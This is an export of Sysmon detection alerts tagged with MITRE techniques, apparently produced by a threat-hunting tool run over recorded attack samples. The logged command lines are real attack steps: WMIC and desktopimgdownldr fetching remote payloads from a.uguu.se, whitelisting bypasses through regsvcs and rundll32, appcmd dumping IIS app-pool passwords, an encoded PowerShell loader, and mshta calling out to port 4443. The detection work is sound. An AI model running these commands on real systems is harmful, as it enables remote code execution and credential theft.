SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-CF01-5CE6-0000-00105DA50C00 + 3872 + C:\Windows\System32\wbem\WMIC.exe + wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4919 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.756 + 747F3D96-6628-5D3F-0000-0010B1968800 + 5708 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 18 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:12.919 + 
365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 18 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:12.919 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5922 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.322 + 365ABB72-3D6E-5CEB-0000-00104C92FF00 + 3100 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5260 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:17:52.899 + 365ABB72-AB70-5C8E-0000-0010781D0A00 + 3272 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" + C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + 
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-A965-5C8E-0000-0010D9100400 + 3884 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 
747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5919 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.232 + 365ABB72-3D6E-5CEB-0000-00108C8EFF00 + 3144 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 305352 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-03 08:47:20.001 + 747F3D96-F098-5EFE-0000-001012E13801 + 1932 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-1CE4-5EFE-0000-0020CC9C0800 + 0x89ccc + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-EF3D-5EFE-0000-0010F3653401 + 5384 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated 
network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 7649 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.577 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.13 + IEWIN7 + 49159 + + false + 10.0.2.18 + + 4443 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 
20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c 
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4917 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.222 + 747F3D96-6628-5D3F-0000-001062788800 + 2040 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5916 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.161 + 365ABB72-3D6E-5CEB-0000-0010CC8AFF00 + 2524 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + 
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAf